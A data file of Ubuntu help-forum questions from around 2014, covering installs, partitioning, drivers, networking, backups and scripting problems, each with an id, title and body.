504419	xscreensaver extras ?	turns out that my previous question , about blank screens at logon , was based on ubuntu 12.04 , and was flagged as `` end-of-life '' by a senior member . i had no idea that my version was so out of date . from the command line , i tried upgrading the version , and was told that there were no updates . i finally burned an .iso of 14.04 and installed it , overwriting all the previous stuff in the partition . now everything seems ok , except for a couple of things . i 'll put them in separate questions : i can understand why the proprietors of ubuntu decided not to include screensavers in the current version , but i do like the entertainment value , and besides , i do have a crt as the monitor for this computer . so i did sudo apt-get install xscreensaver and my xscreensaver was installed . fine . but most of the screensavers in it gave the message `` very few ( or no ) screen savers appear to be available . / this probably means that the `` xscreensaver-extras '' aand `` xscreensaver-gl-extras '' packages are not installed . '' attempts to sudo apt-get install xscreensaver-extras or xscreensaver-gl-extras from the command line gives me `` unable to locate package xscreensaver-extras '' ( or xscreensaver-gl-extras ) . and i see mentions of x-screensaver-data , xscreensaver-data-extra ( no `` s '' ) , and a couple more packages -- what are those ? maybe apt-get install is n't appropriate for support files ? i expect that this would be fairly simple to answer , and any help would be appreciated . many thanks .
504420	resize move partitions on dual boot system	i would like to be able to adjust the partitions shown below . specifically , i want to add an additional 10gb from the unallocated space to /dev/sda5 ( ubuntu install ) . i will then format the remaining unallocated space as ntfs so it can be shared data between windows and ubuntu . i am unable to increase the size of /dev/sda5 - i am only able to shrink it . any assistance would be greately appreciated .
504423	how to install and use ( link ) librsync library	i installed the librsync library using : sudo apt-get install librsync-dev librsync-dbg . but then how do i link this library statically ? i tried : gcc -o my_prog my_prog.c pkg-config -- libs -- cflags ( librsync rsync etc ) . but pkg-config ca n't find it .
504424	is the home directory modifed at all during an upgrade of xubuntu ?	i have a number of encrypted home directories on xubuntu 13.10 ( x86_64 ) . i plan to upgrade to xubuntu 14.04 ; i will be doing that from the admin 's home directory . will the upgrade affect the home directory of the other users ? will those users with encrypted home be asked to do anything else after the upgrade , to finalize the upgrade ?
504427	ubuntu stopped responding just after boot	i have hp probook 445 g1 with ubuntu 12.04 lts installed . now the problem is that when i boot up my pc it boots perfectly but after 4â5 seconds of entering the password , the mouse & keyboard stopped responding . every attempt to type or click does not work .
504433	ubuntu 10.04 server hangs	i am using ubuntu 10.04 lts server for running hadoop cluster , in recent days server hangs and it throws error message in screen but nothing in log . when server hangs could n't login thru local or remote . it happens randomly and the same issue is not repeated in server which was once restarted due to the hanging issue . please let me know any suggestion and idea where to look . error message on local monitor : [ 641677.044778 ] fs : 00007f61ea646700 ( 0000 ) gs : ffff8800100c0000 ( 0000 ) kn1gs:000 0000000000000 [ 641677.081636 ] cs : 0010 ds : 0000 es : 0000 cro : 000000008005003b [ 641677.100839 ] cr2 : 000000000061ade0 cr3 : 000000042f758000 cr4 : 00000000000006 0 [ 641677.137188 ] dro : 0000000000000000 dr1 : 0000000000000000 dr2 : 00000000000000 op [ 641677.174348 ] dr3 : 0000000000000000 dr6 : 000000001fff0ff0 dr7 : 00000000000004 op [ 641677.212210 ] call trace : [ 641677.230768 ] uffffffff810fbba0 > l ? drain_local_pages+0x0/0x20 [ 641677.249676 ] uffffffff8109a9c2 > l ? smp_cal1_function+ox22/0x30 [ 641677.268199 ] uffffffff8106def4a ? on_each_cpu+ox24/0x50 [ 641677.286434 ] uffffffff8101a0bc > 1 ? drain_all_pages+oxlc/0x20 [ 641677.304433 ] uffffffff8101a585 > l ? __alloc_pages_slowpatb+ox3c5/0x580 [ 641677.322223 ] uffffffff8101a8b1 > l ? __alloc_pages_nodemask+ox171/0x180 [ 641677.339797 ] uffffffff81089512 > l ? brtimer_cance1+0x22/0x30 [ 641677.357173 ] uffffffff8112d6c7 > l ? alloc_pages_current+ox87/0xdo [ 641677.374510 ] uffffffff810197ae > 1 ? __get_free_pages+oxe/ox50 [ 641677.391581 ] uffffffff81064056 > l ? dup_task_struct+ox46/0x170 [ 641677.408413 ] uffffffff81065241 > l ? copy_process+oxbl/oxe90 [ 641677.424899 ] uffffffff810660b4 > l ? do_fork+ox94/0x430 [ 641677.441042 ] uffffffff81098b38 > l ? do_futex+oxb8/0x1b0 [ 641677.456781 ] uffffffff81098cab > 1 ? sys_futex+0x7b/0x170 [ 641677.472137 ] uffffffff81011558 > l ? sys_clone+ox28/0x30 [ 641677.487142 ] uffffffff810134d3a ? stub_clone+ox13/0x20 [ 641677.501801 ] uffffffff810131b2 > l ? system_cal1_fastpath+ox16/0x1b
504435	shutting down when persistent ubuntu freezes	i 'm using persistent usb , with 4gb casper-rw . sometimes ubuntu does n't respond at all . how do i restart/shutdown safely without damaging the casper-rw ? it got corrupted two times , and i had to install everything again . ubuntu 14.04 .
504436	adding canon pixma mx860 to ubuntu 14.04	i have a canon pixma mx680 all-in-one hard-wired to my lan . trying to add a printer using settings | printer | add printer | network printer gave me a whole bunch of choices -- find network printer , appsocket/hp jetdirect , ipp , https , ipp14 , and so on . i tried to use `` find network printer '' using my printer 's ip address ( no hits ) , then its mac address ( changing the usual colon separators to the apparently-ubuntu-standard hyphens ) , and it seemed to find the printer , and i chose the driver from the list , and it showed up in the printers box , but i could n't print a test page . i removed the printer and tried this approach from the command line . it seemed to work , and again the printer shows up in the printers box . still , i 'm unable to print a test page . looking at properties | settings , i see that printer state is `` processing - printer not responding ; will retry , '' then going back to `` processing . '' print queue shows my test pages lined up ( and i deleted them -- or cancelled ? -- what 's the difference ? ) . as suggested by that page , i installed xsane , which was able to find the printer 's scanner and scan successfully . so , it does n't seem that it ought to be a big step to get the printer going -- eh ? any help gratefully received . if an answer requires undoing what i did , please let me know how to do that . if it requires typing things into terminal mode , i 'd very much appreciate an explanation of what the lines do ( i 've been working with computers a long time , but i 'm completely new to linux ) . many thanks .
504439	problem when installing libncurses5-dev	when i tried to install libncurses5-dev : sudo apt-get install libncurses5-dev i got this error message : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it
504441	no boot device found error	i have both windows 8 and ubuntu on my laptop . dual boot used to work fine , but recently i have been getting this weird error no boot device found . i tried boot repair using usb live ubuntu , but it did n't work . also my hard disk has n't crashed since i am able to access it using my usb booted ubuntu . i got this url from boot repair .
504442	how to remap capslock key properly ?	i want to remap capslock to ctrl on a low level , such that it also works in games , virtual consoles etcetera . i tried adding xkboptions= '' ctrl : nocaps '' to /etc/default/keyboard , but that does n't work . how to proceed ?
504445	remastering/modifying ubuntu livecds - authentication failure	i 'm new to linux . my current goal is to build my own livecd of ubuntu . small size , tiny gui , controlled by vnc and/or ssh . my workspace is a 12.04 full installation in virtual box . as the `` base '' i try to use a copy of the `` ubuntu mini remix '' ( tried 13.10 and 12.04 ) . for remastering i tried the ubuntu-builder , the uck and customizer . ( uck and customizer ( could ) work great ) . my problems is , no matter what tool i use , it ends up failing every time with the same error . a screen filled with a lot of authentication failure messages . even when i only feed the iso to one of the programs and immediately recreate the iso . i found out , that it maybe it has something to do with the dynamically created default user called ubuntu , which the system uses as the user used to boot . in the chroot environment i could not find the user in the passwd . i guess the generation process is defined in the casper.conf . i tried modifying the casper.conf , but to no luck . why ca n't i just tell the system what user to use , when it boots ? or why does the generating process of the default user called ubuntu break , if i touch the iso ? ( maybe it does work , but the authentication on boot dislikes the generated user . )
504448	`` error while getting interface flags : no such device '' while starting airmon-ng for aircrack	i am a newbie to ubuntu and aircrack and was trying to start airmon-ng to detect available wifi networks . but every time i enter the command : sudo airmon-ng start wlan0 an error comes up : error while getting interface flags : no such device .
504449	installing ubuntu and accessing ntfs drive	i have two drives ( c : , d : ) and both are formatted with ntfs . i have installed windows 8.1 on the c drive and stored important files on d : . i want to install ubuntu along side of windows 8.1 by making a partition on c drive . after making a partition and installing ubuntu , will i be able to access the d drive in ubuntu or will have have an issue with the fact that it is in ntfs format ?
504450	upgrade to xubuntu 14.04 broke the perlbrew	i upgraded my xubuntu 13.10 ( x86_54 ) to 14.04 . the resulting 14.04 has the following problems : the $ path variable now contains only these two entries : /home/myuid/perl5/bin /home/myuid/perl5/perlbrew/perls/perl-5.16.3/bin the system also complains : ca n't locate app/perlbrew.pm in @ inc please note that i do have perlbrew.pm in : /usr/local/share/perl/5.14.2/app/perlbrew.pm . i 'd appreciate very much some help in getting the perlbrew to run . hopefully without having to re-install perlbrew in the new version . nor go back to the old xubuntu 13.10 . i 'd also like to understand how this happened .
504452	node in maas not waking up on lan	i am trying to add nodes in maas cluster . i setup maas server in vm using ubuntu 14.04 lts . i completed the post-install tasks like installing maas , configure network , dhcp-dns , creating logins , importing boot images as explained here : http : //maas.ubuntu.com/docs1.5/install.html http : //maas.ubuntu.com/docs1.5/cluster-configuration.html in the node 's bios , i did change the boot order so that it boots from the lan and node successfully booting up from pxe boot from the maas cluster controller through atuo detect node function and maas dhcp server giving ip address from its dhcp range to node ( in this process first time i switched on the node from its power button not from maas ) after completing above process the machine is now showing `` declared '' in maas and node automatically power down . wake-on-lan details are already configured on node and just to make sure if everything working fine i tested wake-on-lan function from my mobile phone app and its working without any problem . now i checked `` commission '' from menu but commissioning not pulling additional information from node ( node is off because maas not sending magic packets to node 's wake-on-lan ) but if i switch on my node by my self through my mobile app after showing lots of lines once again node power down then node showing me 'ready ' status in maas but when i check node cpu and ram details , it 's showing me 0mb 0cpu . after completing above task maas showing me node status is ready and then i tried to start node from maas it says `` the action `` commission selected nodes '' could not be performed on 1 node because its state does not allow that action . '' main issue : node wake-on-lan 100 % working from my mobile app but maas not sending magic packets to node from step one . there is no firewall between maas , node and mobile . important : i am using using maas dhcp for my entire network so i can browse internet from my cell phone with maas dns .
504453	how to re-install ubuntu that is pre-installed by manufacturer	actually i wiped off ubuntu 12.04 lts that was pre-installed by manufacturer and want to just have it back is there any of doing this .
504456	about partition of harddisk	i had 320gb hard disk which had 5 partitions c:95gb , d:60gb , e:60gb , f:24gb , g:48gb . i was installing ubuntu 8.0 before 3yrs it would show correct path to install or separate partition to install.now in ubuntu 14.0 i tried of installing it took all the partitions and made as single c:298gb disk.all my partitions are lost.all data are also lost . what can i do now to recover partition please help .
504457	ubuntu 14.04.1 realtek 8191sevb wifi does n't work	i have just updated my laptop ( toshiba qosmio f60 ) , from ubuntu 12.04 to 14.04 ( .1 ) with a `` clean '' installation using the usb disk . the wifi did n't work properly on ubuntu 12.04 ( that 's why i updated ) , but on 14.04 it 's even worst . on windows 7 it works perfectly . i can see the wireless networks , but i can not connect to them . it tries to connect several times without success , and after such tries , the wifi disconnects after next reboot . this happens both at home and at work ( so i assume routers are n't the problem , since on windows 7 , and also my android phone , can connect to them properly ) . i have a realtek rtl8191sevb card . this is the output of lshw -c network ( sorry , translated from spanish ) : *-network description : wireless interface product : rtl8191sevb wireless lan controller manufacturer : realtek semiconductor co. , ltd. physical id : 0 bus information : pci @ 0000:03:00.0 logic name : wlan0 version : 10 series : b4:74:9f:49 : fd : ba width : 32 bits clock : 33mhz capacity : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192se driverversion=3.13.0-32-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resourcess : irq:17 ioport:3000 ( size=256 ) memoria : d3600000-d3603fff i have searched this problem for several hours . all the solutions i found correspond to previous kernel versions ( in which you have to re-compile the realtek driver ) . however , since kernel 3.8 ( i am using 3.13 ) , the realtek driver is already included . i have also tried the ndiswrapper with the windows xp driver , but the problem goes worst and the wifi option on the network-manager does n't even appear . the only workaround solution i found is to change to debian , but i would like to keep using ubuntu . any idea of what is going on ? thank you in advance for your responses . p.s . : find attached the lsmod output : module size used by rc_dib0700_rc5 12508 0 tuner_xc2028 31249 1 snd_hda_codec_hdmi 46254 4 snd_hda_codec_realtek 61438 1 arc4 12608 2 btusb 32412 0 snd_hda_intel 52355 5 rfcomm 69160 8 bnep 19624 2 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel bluetooth 391196 22 bnep , btusb , rfcomm dvb_usb_dib0700 144289 0 dib8000 57402 1 dvb_usb_dib0700 dib7000m 22858 1 dvb_usb_dib0700 dib0090 38185 1 dvb_usb_dib0700 dib0070 18232 1 dvb_usb_dib0700 dib7000p 38420 2 dvb_usb_dib0700 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel uvcvideo 80885 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel dib3000mc 23239 1 dvb_usb_dib0700 snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi nvidia 10675249 43 snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi rtl8192se 63196 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo dibx000_common 18752 5 dib8000 , dvb_usb_dib0700 , dib3000mc , dib7000m , dib7000p dvb_usb 24215 1 dvb_usb_dib0700 coretemp 13435 0 videodev 134688 2 uvcvideo , videobuf2_core dvb_core 121659 3 dib8000 , dvb_usb , dib7000p snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi rc_core 28124 4 dvb_usb , dvb_usb_dib0700 , rc_dib0700_rc5 rtl_pci 26690 1 rtl8192se snd_timer 29482 2 snd_pcm , snd_seq rtlwifi 63475 2 rtl_pci , rtl8192se kvm_intel 143060 0 snd 69238 21 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi kvm 451511 1 kvm_intel mac80211 630653 3 rtl_pci , rtlwifi , rtl8192se soundcore 12680 1 snd cfg80211 484040 2 mac80211 , rtlwifi mei_me 18627 0 joydev 17381 0 serio_raw 13462 0 lpc_ich 21080 0 parport_pc 32701 0 i7core_edac 24122 0 toshiba_acpi 22901 0 drm 303102 2 nvidia edac_core 62291 1 i7core_edac mei 82276 1 mei_me sparse_keymap 13948 1 toshiba_acpi ppdev 17671 0 mac_hid 13205 0 lp 17759 0 wmi 19177 1 toshiba_acpi toshiba_bluetooth 12852 0 video 19476 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52570 0 hid 106148 2 hid_generic , usbhid psmouse 106678 0 ahci 25819 2 r8169 67581 0 libahci 32560 1 ahci sdhci_pci 23172 0 mii 13934 1 r8169 sdhci 43015 1 sdhci_pci
504466	ubuntu installer does n't see my partitions , neither wubi nor usb stick . what to do ?	i 'm trying to install ubuntu next to my windows 8.1 , but there are some errors i get . i opened wubi ubuntu demo mode and tried to install from there , but when i get to partition table of the hard disk i use , there is none at all . it sees the disk whole with no partition . i did try to make a partition but when i did that , it erased all the data in the disk . i do n't want to use ubuntu with try ubuntu options always . i do n't want to install ubuntu in usb , and i ca n't afford and do n't want to buy a new disk to install ubuntu in . and i do n't want to use only ubuntu in my pc . because i 'm .net programmer . but i do n't know linux at all . so ; then i tried to install from usb stick and it still does n't see my partitions , so what should i do ? what should i do in these circumstances ? how to install ubuntu ?
504468	compiz key bindings not working	after upgrading from ubuntu 12.04 to 14.04 , i have problems with the compiz key bindings . i use gnome flashback and compiz , and want to use some window managing compiz plugins such as put and grid . since i upgraded , all compiz key bindings using super key are not working anmyore . for instance , when i open nautilus and hit super + numpad key , a search popup form appears with the typed number instead of the a compiz action bound to that key combination . how can i restore the old behavior that compiz hooks into these key combinations involving the super key ? thanks in advance !
504469	dns-nameservers problem	i run ubuntu server 12.04.1 lts precise . if my network/interface was set on auto , the dns works correctly . i 'm able to run apt-get update and to ping various sites . when my network/interface was set to static , dns does n't work . i defined the dns addresses on /network/interface , and they appear in /etc/ @ resolv.conf , but i 'm unable to run apt-get update . also if i want to run ping www.google.de it does n't work , unless the internet address is defined in /etc/hosts . the external router works fine . i 've spent almost two days to find a solution on the internet . in all the related questions there where problems with /etc/ @ resolv.conf ( which was blank ) . it 's not my case . that file contains all the information needed ( i.e . the dns-nameservers ) .
504472	flash ( peperflash ) on chrome in 14.04 lts not working	since i updated to 14.04 lts i have n't been able to get flash to work on chrome , it works just fine in firefox and chromium but in chrome videos are really laggy to the point the browser just freezes and i have to kill it . as i said , chromium ( after installing non-free pepperflash ) and firefox work ok by default , what could be wrong my chrome ? also , i even did a clean trusty install , no luck .
504474	how to get vpn internal traffic and external internet traffic to work simultaneously	i 'm connecting to a cisco compatible vpn , in xubuntu 14.04 . i can connect and access ips and servers on the network . however , i can not access external websites . when i change the settings this situation reverses and i can access the internet but not the internal stuff on the vpn . under vpn config - > ipv4 setting - > routes i have tried all permutations of `` ignore automatically obtained routes '' and `` use this connection only for resources on its network '' . i 've also tried manually configuring the dns servers for both the vpn and using google 's public ones , and the additional search domain for the vpn as revealed in syslog output when connecting to it . i 've also done dpkg-reconfigure resolveconf to no avail . all i want is to be able to connect to the vpn , access servers and ips on it whilst also being able to access the wider internet without first disconnecting the vpn . ip route output as requested no vpn : default via 192.168.1.1 dev eth0 proto static 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.151 metric 1 vpn : default via 192.168.1.1 dev eth0 proto static 10.0.0.0/24 dev tun0 proto static 10.0.1.0/24 dev tun0 proto kernel scope link src 10.0.1.116 10.0.4.0/24 dev tun0 proto static 10.0.6.0/24 dev tun0 proto static xx.xx.xx.xx via 192.168.1.1 dev eth0 proto static 172.16.0.0/24 dev tun0 proto static 192.168.1.0/24 dev tun0 proto static 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.151 metric 1 ( xx.xx.xx.xx is my public ip )
504480	bluetooth icon issues	i can actually use the bt keyboard to select an os at start up . once ubuntu starts and i try to search for devices they will flash in the window momentarily and not connect and then the menu bar bluetooth icon shows a lock , so i believe bluetooth is being blocked by something as soon as it discovers any devices . late 2011 macbook pro .
504482	how do i add a relationship between two charms to pass information between them ?	i am new to juju . so far i have created and started deploying one application charm and sever charm separately . but now from the application i need to add relationship to server charm and get details from server charm . details like public address and private address . i researched about how to add relations between two charms . but i am not clear about how to add relations and get details . i only know i want to add some parameter in metadata.yaml file . can anyone tell me how to add relation and get details from server charm ? basically i need to provide ip address by server charm and after adding relationship from application charm need to read this ip address .
504485	screen recording with ring buffer	is there any screen recording software which can record to ring buffer ? i 'd like to have a recording of the last 10-15 minutes happening in some window . to be more concrete , i want to this application to be `` always '' running . at any point in time , i want be able to retrieve a recording of what happend in the last 10 minutes . as i do n't want my disk to fill up , the size of the recorded file should limited . on the other hand , the recording should never stop ( i.e. , if the size limit is reached , throw away the beginning of the recording ) .
504490	virtual box file access	i 'm running android on a virtualbox on my ubuntu 14.04 machine . i want to know if there is a way to access system files and images stored within this virtual android machine from within my host ubuntu machine . is there something like a hidden file path i`m missing in nautilus or something ) ?
504496	ubuntu 14.04 livecd chroot error	i wanted to try to reinstall grub2 for ubuntu 14.04 : run 14.04 livecd mount the root partition and mount dev sys run proc : sudo mount /dev/sdc1 /mnt for d in dev sys run proc ; do sudo mount -o bind / $ d /mnt/ $ d ; done chroot sudo chroot /mnt /bin/bash execute apt-get update , but one error occured : bus error ( core dumped ) is chroot not work on 14.04 any more or there something wrong with my system ?
504498	restore a backup from duplicity	i lost everything on my computer but hopefully i made several backups with duplicity . my problem is that i ca n't restore these backups . i tried a couple of commands like duplicity restore file : ///media/backup_path /home/user/destination_file but i get these errors import of duplicity.backends.dpbxbackend failed : no module named dropbox synchronizing remote metadata to local cache ... copying duplicity-new-signatures.20140728t081856z.to.20140729t071746z.sigtar.gz to local cache . [ errno 21 ] is a directory : '/media/134b04a8-bba0-4477-ab48-fd443c9ad3d4/duplicity-new-signatures.20140728t081856z.to.20140729t071746z.sigtar.gz' does anybody knows how to fix this problem ?
504499	systray icons missing ubuntu 14.04	we use druva insync for backups at the office . however after upgrading to ubuntu 14.04 , we have been struggling to get the tray icons working . we have followed all steps we used in previous linux versions but this did not seem to work though . i am currently running ubuntu 14.04 lts , unity and with kernel version : 3.13.0-32-generic . does anyone know how i can about in getting the systray icons working as druva specifically can not be used without the tray icon . regards
504504	installing eclipse on lubuntu	i 've followed the exact steps provided by : installing eclipse kepler , i receive the eclipse icon in the start menu ( or whatever u call it in linux systems ) however when i click in it , it remains idle and nothing happens , and it does n't open up the ide , also when i navigate towards the eclipse folder using the terminal and i type eclipse i receive the following message : root @ mossig-linux : /opt/eclipse # eclipse -bash : /usr/local/bin/eclipse : can not execute binary file : exec format error can anyone tell me what am i doing wrong here ?
504505	create a live cd with uck	i am trying to create a livecd using uck with ubuntu 14.04.1 but when the iso is opened using uck the sources.list file has only 4 lines . even if sources.list is manually edited if i try to install apache2 , postgres or dovecot-core it throws errors and even postgres gets installed without utf-8 . can somebody help me to sort out this error so that i can create livecd with 14.04.1 on either 64 bit or 32 bit with apache2 , postgres and dovecot .
504507	installing unity 14.04 on qemu arm	how do i install ubuntu desktop 14.04 with unity in qemu-system-arm virtual environment ? which debs do i have to install and in what sequence ? v or is there an executable which would make all the work for me ? i use qemu 2.0 , linux-image-3.13.0 generic kernel for arm . in 12.04 it does work , but 14.04 is broke somewhere . i 've got unity greeting screen , but when i select user i see only the startup backdrop with 14.04 lts string at the lower-left corner . # cat /var/log/lightdm/x-0-greeter.log ... ... . ** ( at-spi2-registryd:1002 ) : warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( at-spi2-registryd:1002 ) : warning ** : unable to register client with session manager ... ... . [ +167,42s ] debug : unity-greeter.vala:605 : got a sigterm [ +167,44s ] debug : settings-daemon.vala:78 : failed to acquire name org.gnome.sessionmanager [ +167,44s ] debug : settings-daemon.vala:105 : failed to acquire name org.gnome.screensaver [ +167,57s ] debug : unity-greeter.vala:135 : failed to acquire name com.canonical.unity g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . ... ... .. $ cat .xsession-errors libegl warning : dri2 : failed to authenticate script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning ... ... . many times ... ..
504508	ubuntu 14.04 with internet connection sharing internet to win xp vitualbox	i 've looked through the posted questions and there are a lot of topics about sharing guest 's e.g . win xp connection to ubuntu host . what i 'm actually looking is if there is a way to share ubuntu 's ( host ) internet connection to guest 's ( win xp ) , i use xubuntu netbook with wi-fi to share internet to ubuntu 14.04 desktop through lan cable , it works pretty well , but ... i need to run this program which i was n't able to run through wine on ubuntu , so i followed given advice and installed virtualbox with win xp on it ... now the problem is i do not have internet connection on that guest win xp in virtualbox , but i really need it . so the question is if there is a way to do this kind of thing and how can i establish internet connection from ubuntu 14.04 host to win xp guest in virtualbox ? all help will be much appreciated . sorry if i did n't see already existing forum topic , i tried to look it up , but did n't find the needed information . thank you
504514	requires installation of untrusted packages when i try installing software	why does ubuntu 14.04 tell me requires installation of untrusted packages whenever i try to install software via the ubuntu software centre ? it says this requires installing packages from unauthenticated sources , when i tried installing the vlc media player , the details are : liba52-0.7.4 libaacs0 libass4 libbasicusageenvironment0 libbluray1 libcddb2 libchromaprint0 libcrystalhd3 libdc1394-22 libdca0 libdirac-encoder0 libdirectfb-1.2-9 libdvbpsi8 libdvdnav4 libdvdread4 libebml4 libenca0 libfaad2 libgnutls28 libgroupsock1 libgsm1 libhogweed2 libiso9660-8 libkate1 liblivemedia23 libmad0 libmatroska6 libmodplug1 libmp3lame0 libmpcdec6 libmpeg2-4 libopenjpeg2 libopus0 libpostproc52 libproxy-tools libresid-builder0c2a libschroedinger-1.0-0 libsdl-image1.2 libsidplay2 libssh2-1 libts-0.0-0 libtwolame0 libupnp6 libusageenvironment1 libva-x11-1 libva1 libvcdinfo0 libx264-142 libxcb-composite0 libxcb-keysyms1 libxcb-xv0 libxvidcore4 libzvbi-common ibzvbi0 tsconf
504518	bumblebee wo n't turn on as when i try to , a second later , it turns back off	i tried looking for this but only see things pertaining more to the card . bumblebee itself wo n't turn on for more than a second . i followed the questions on this link here which all seemed fine to do but when actually testing the software , nothing actually happens other than i turn it on and then it switches back off . to turn it on , i found that i have to the applet , click either of the preferred apps options and it turns on . the a second later , it switches back off . i 've tried looking at the other settings but ca n't find what i 'm actually supposed to do . any guidance from anyone ? edit : when typing in certain commands , this is what i get . chris @ chris-hp-envy-dv6-notebook-pc : ~ $ apt-cache policy bumblebee bumblebee : installed : 3.2.1-90~trustyppa1 candidate : 3.2.1-90~trustyppa1 version table : *** 3.2.1-90~trustyppa1 0 500 http : //ppa.launchpad.net/bumblebee/stable/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status 3.2.1-5 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages chris @ chris-hp-envy-dv6-notebook-pc : ~ $ apt-cache policy primusrun n : unable to locate package primusrun
504524	backlit keyboard	i have a dell vostro 3650 running newest ubuntu install . i read this laptop has a backlit keyboard . i 've researched how to turn it on with no luck . i 've tried hitting the fn f6 keys and the fn right arrow key .
504530	cron job not working properly on start up	thanks for reading this . i have created a bash script to backup my databases . the script will create a directory for the day then create a backup file for each database within that directory . it runs as expected if i call it from the command line . i want it to run when the machine starts up so i have created a cron job to run it . when the cron job runs it creates the directory but it does n't create the files . i have checked the syslog and i can see the cron job being processed but there is no output that indicates an error . there is a message which appears to suggest that an email would have been sent if postfix or some such were installed . i do n't really want to install postfix unless i really have to . is there any other log i could be looking at ? here 's the cron job ( it runs as root ) : @ reboot /usr/bin/db.backup.sh here 's the bash script : # ! /bin/bash db_backup= '' /files/database_backups/`date + % y- % m- % d` '' db_user= '' root '' db_passwd= '' a '' hn=`hostname | awk -f. ' { print $ 1 } '` # create the backup directory mkdir -p $ db_backup # remove backups older than 10 days find /files/database_backups/ -maxdepth 1 -type d -mtime +10 -exec rm -rf { } \ ; # backup each database on the system for db in $ ( mysql -- user= $ db_user -- password= $ db_passwd -e 'show databases ' -s -- skip-column-names|grep -vie ' ( staging|performance_schema|information_schema ) ' ) ; do mysqldump -- max-allowed-packet=1073741824 -- user= $ db_user -- password= $ db_passwd -- events -- opt -- single-transaction $ db | gzip > `` $ db_backup/ $ db- $ ( date + % y- % m- % d ) .sql.gz '' ; chown -r www-data : www-data $ db_backup done
504531	mouse snapping back to upper right hand corner	i am running ubuntu 14.04 lts on a lenovo erazer x510 desktop . the mouse wants to be in the upper right hand corner of the screen . you can move it but it just snaps back into the corner . i tried sudo modprobe -r psmouse sudo modprobe psmouse and this works , but after about 2 or 3 minutes the mouse starts acting up again . it also does it from the live cd i have tried different usb ports , and i am unable to even open terminal when in unity . even with the mouse unplugged , it is acting as there is one clicking . sudo lightdm did n't help
504533	lubuntu : after log in hangs . need to backup and save my files	problem : my lubuntu was having some problems with firefox yesterday so i decided to close it down and restart . but after logging in it just hangs . nothing happens . afters some searching on here i tried to update via terminal , but still no help . i can log in as a guest and i can log in via terminal but i can not log in as normal and get access to my files . i am a newbie with linux and would like to back up my files and then just install something new . so how can i back up my data while not being able to log in ? assistance appreciated .
504535	automating rsync commands	i currently have too many rsync commands that i run on a day to day basis . could someone be kind enough to let me know how i can automate these commands ? i am new to linux so a little bit of explanation might be needed .
504536	installing ubuntu 14.04 to dual boot with windows 7 on one hard drive	i 'm a linux newbie , i 'm trying to install ubuntu 14.04 together with my current windows 7 setup . so i burned a dvd with the .iso file and booted into it , started the install process and from what i see from the internet there should be an option to `` install alongside ... '' , but i do n't have that because appearently it does n't recognize my windows install ( i have one 500gb hard drive with 100gb free - all in one partition ) . so from what i saw i need to use fixparts to fix device sda which is my hard drive . but it warns me that it does n't start from sector 1 and it can cause problems in certain oss . i do n't want to confirm it because i 'm afraid it might corrupt my hard drive , is it safe ? before i thought about writing this question i tried partitioning manually via the `` something else '' option . but in all the guides i saw , they have `` free space '' as an option , while i have one partition that is 500gb with 400gb used , maybe i could change the size of my partition to 400gb and then i 'll have free space , but then i have no space in windows 7 , should i change the size to 420gb and the rest 80gb assign to linux partitions as the guide says ? i would really appreciate it if you answer both my questions , or if you think answering one question will eliminate the need for the other , i 'd appreciate that too . thanks .
504544	i ca n't find programs i 've installed through ubuntu software centre	i 've been trying to fix a few issues on my laptop , one of which is the fact that i use beats audio . i 've been following these steps but i 'm struggling to get past 2 . i installed trusty1 from the link previous and it went through my ubuntu software centre , but now i have no idea how to open hda-jack-retask because it does n't come up in my apps menu and trying to run it through terminal just brings back `` hda-jack-retask : command not found '' how do i find this program to open it ?
504545	what is the difference between security.ubuntu.com and archive.ubuntu.com ?	the various releases have a -security channel in archive.ubuntu.com . how does that channel differ from the security.ubuntu.com ? if i have to set up a local mirror , how does security.ubuntu.com come into the picture ? i am using apt-mirror for mirroring .
504546	error message 'source : not found ' when running a script	i am creating a little automated setup script that will modify /etc/profile and $ home/.profile if some paths are not exported . then , i 'd like to reload these automatically . i have read that source does this , so i fired up my terminal and entered : source /etc/profile source ~/.profile from the terminal , it did n't output any error . however , putting these two commands inside the bash script results in source : not found . how can i be sure that the script is executed by bash , even if # ! /bin/sh is specified ( apparently , it does not guarantee it ) ? why would it say that these two sources can not be found when they are unmistakably there ?
504550	latex error : file `kpfonts.sty ' not found	i downloaded a template tried to run on my texmaker . it says `` latex error : file `kpfonts.sty ' not found . '' how can i install this font on my system ?
504560	ca n't compress whole file with tar ?	i 'm not an expert with tar ( xz ) but i have a video ( flv ) and it 's size 95mb i would like to compress it and i was using this command xz_opt=-9 tar -jcvf myfile.tar.xz 1.flv ( i got this from a website ) but i keep getting this error : tar : myfile.tar.xz : can not write : broken pipe tar : error is not recoverable : exiting now and myfile.tar.xz has only 24mb of my video ... . i do n't know what to do ! ! help please
